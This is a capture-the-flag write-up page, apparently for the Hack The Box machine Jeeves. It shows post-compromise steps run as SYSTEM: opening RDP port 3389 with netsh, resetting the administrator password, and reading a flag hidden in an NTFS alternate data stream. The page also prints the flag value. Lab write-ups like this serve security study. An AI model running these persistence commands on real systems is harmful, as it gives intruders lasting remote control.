InfoSec LAB

Jeeves_Beyond

Created: 2 min read

Beyond

This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM after compromising the target system.

c:\windows\system32> cmd /c netsh firewall add portopening TCP 3389 "Remote Desktop"
 
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.
 
 
c:\windows\system32> NET USER administrator Qwer1234  
The command completed successfully.

Flag

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1
 
 Directory of C:\Users\Administrator\Desktop
 
11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,329,575,424 bytes free
 
C:\Users\Administrator\Desktop> type hm.txt
The flag is elsewhere.  Look deeper.

The usual root.txt file is nowhere to be found at the C:\Users\Administrator\Desktop directory Instead, there is a file that claims the flag is elsewhere

C:\Users\Administrator\Desktop> dir /R
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1
 
 Directory of C:\Users\Administrator\Desktop
 
11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,329,382,912 bytes free

Checking for the alternate data stream, it reveals one; hm.txt:root.txt:$DATA

The term, Alternate Data Stream or (ADS), refers to additional streams of data associated with a file. Alternate data streams are a feature of the NTFS (New Technology File System) file system used in Windows. It allow more than one data stream to be associated with a filename (a fork), using the format,filename:streamname (e.g., text.txt:extrastream)

C:\Users\Administrator\Desktop> more < hm.txt:root.txt:$DATA
afbc5bd4b615a60648cec41c6ac92530
 
C:\Users\Administrator\Desktop> more < hm.txt:root.txt 
afbc5bd4b615a60648cec41c6ac92530

Utilizing the data stream redirection technique (<), one can access the alternate data stream.

Scheduled Tasks

Just default

Services

Interactive Graph View

Backlinks